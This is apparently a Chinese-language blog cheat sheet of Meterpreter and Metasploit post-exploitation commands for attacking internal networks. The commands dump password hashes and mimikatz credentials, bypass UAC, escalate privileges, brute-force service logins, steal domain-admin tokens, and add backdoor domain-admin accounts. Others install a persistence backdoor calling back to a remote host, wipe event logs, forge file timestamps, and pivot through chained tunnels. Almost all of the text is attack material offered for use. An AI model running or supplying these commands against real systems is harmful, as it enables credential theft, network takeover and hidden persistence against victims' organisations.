Meterpreter-Tips

凡是不能把我毁灭的,都将使我更强

meterpreter在内网中的作用就跟web中的sqlmap和burpsuite的价值是一样的。本文只涉及内网,持续更新

0x01 枚举可用信息 (Linux | Windows)

run post/linux/gather/hashdump #hash密码
run post/linux/gather/checkvm #是否虚拟机
run post/linux/gather/enum_configs #枚举配置信息
run post/linux/gather/enum_network #枚举网络配置
run post/linux/gather/enum_protections #发现像IDS,防病毒,防火墙等
run post/linux/gather/enum_system #获取有关用户帐户/软件/服务/Linux版本
run post/linux/gather/enum_users_history #枚举历史信息
run post/windows/gather/arp_scanner #检测当前session(sessions -i number)所在网段的IP地址
run post/windows/escalate/getsystem #getsystem
run post/windows/gather/credentials/gpp #寻找储存在SYSVOL中的Groups.xml
post/windows/gather/enum_unattend #全盘搜索Unattend.xml文件查找账户密码
exploit/windows/local/always_install_elevated #创建一个随机文件名的MSI文件并在提权成功后删除所有已部署的文件
run vnc
run scraper #常见信息收集[好用,没有之一]

0x02 Bypass-modules

exploit/windows/local/bypassuac_vbs #会生成新的session[getsystem]
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac
exploit/windows/local/ask
exploit/windows/local/ms13_053_schlamperei
exploit/windows/local/ms14_058_track_popup_menu
exploit/windows/local/ms16_016_webdav #Windows 7 SP1
exploit/windows/local/ms16_032_secondary_logon_handle_privesc
exploit/windows/local/trusted_service_path
exploit/windows/local/service_permissions

0x03 service-attack-modules

use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/telnet/telnet_login
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mysql/mysql_login
use auxiliary/scanner/oracle/oracle_login
use auxiliary/scanner/postgres/postgres_login
use auxiliary/scanner/vnc/vnc_login
use auxiliary/scanner/pcanywhere/pcanywhere_login
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/ftp/anonymous

0x04 meterpreter常用命令

pwd |edit |upload |download |getuid |getsystem |sysinfo #基本命令
python
python_import <-f file path> [-n mod name] [-r result var name]
python_execute <python code> [-r result var name]
python_reset
powershell
powershell_execute <powershell code> [-s session-id]
powershell_import <path to file> [-s session-id] #执行本地ps1或者dll
powershell_shell #会话终端
kiwi
kiwi_cmd "privilege::debug sekurlsa::logonPasswords"
mimikatz
wdigest
mimikatz_command -f sekurlsa::logonPasswords -a "full"
mimikatz_command -f sekurlsa::kerberos -a "full"
sniffer
sniffer_interfaces
sniffer_start [网卡id]
sniffer_stats [网卡id]
sniffer_dump [绝对路径]
令牌劫持[whoami /groups]
ps #查看目标机器进程,找出域控账户运行的进程ID,假如发现PID为 6666
steal_token 6666 [pid] #偷取Token
use incognito #当ps找不到域控账户进程时
list_tokens -u #列出可用token,假如找到域管理员token
impersonate_token 2008.com\\dcadministrator #使用域管理员token运行meterpreter
add_user hacker password -h 192.168.1.2 #在域控主机上添加账户,ip指向域控
add_group_user "DomainAdmins" test -h 192.168.1.2 #将账户添加至域管理员组
migrate pid #将Meterpreter会话迁移到PID为pid的进程中 [不稳定,explorer.exe]
execute -H -i -f cmd.exe #创建新进程cmd.exe,-H不可见,-i交互
timestomp c:/a.txt -c "11/11/2011 11:11:11" #修改文件的创建时间
arp_scanner -r 192.168.1.0/24
run persistence -X -i 5 -p 2222 -r x.x.x.x #开机启动项vbs后门 X86_Linux不支持此脚本
run metsvc -A #Meterpreter服务后门[windows/metsvc_bind_tcp]
clearev #清理痕迹
run autoroute -s 192.168.1.0/24 #添加路由,配合run post/windows/gather/下的模块使用

0x05 一级隧道

(依赖:建立meterpreter正常通信 [re:192.168.1.2])
portfwd add -l 1234 -p 3389 -r x.x.x.x #将目标的3389端口转发到本地1234[rdesktop 127.0.0.1:1234]
ssh -f -N -D 127.0.0.1:2222 root@10.1.1.3 #ssh端口转发
route add 10.1.1.0 255.255.255.255 1 #添加session 1的路由表[route print]
use auxiliary/server/socks4a #建立隧道
vim /etc/proxychains.conf
socks4 127.0.0.1 1080
proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 10.1.1.2

0x06 二级隧道

route add 10.1.1.2 255.255.255.255 2 #添加一级隧道路由表
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp #正向通道
set RHOST 10.1.1.1
set RPORT 2222
use auxiliary/server/socks4a #建立隧道
vim /etc/proxychains.conf
socks4 127.0.0.1 1081
proxychains nmap -sT -sV -p21,22,23,80 -n -Pn -vv 172.16.6.3

0x07 三级隧道

route add 172.16.6.3 255.255.255.255 3 #添加二级隧道路由表
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp #正向通道
set RHOST 172.16.6.3
set RPORT 3333

0x08 彩蛋

Youtube视频请翻墙,请关闭广告插件

相关链接
Windows-Exploit-Suggester
exploit-db
securityfocus
hackingarticles
https://www.youtube.com/watch?v=jCoL7oXvT_E
https://www.youtube.com/watch?v=DlJyKgfkoKQ

本文为原创,转载请遵守本站的版权声明

更新于: 2018年5月16日 14:05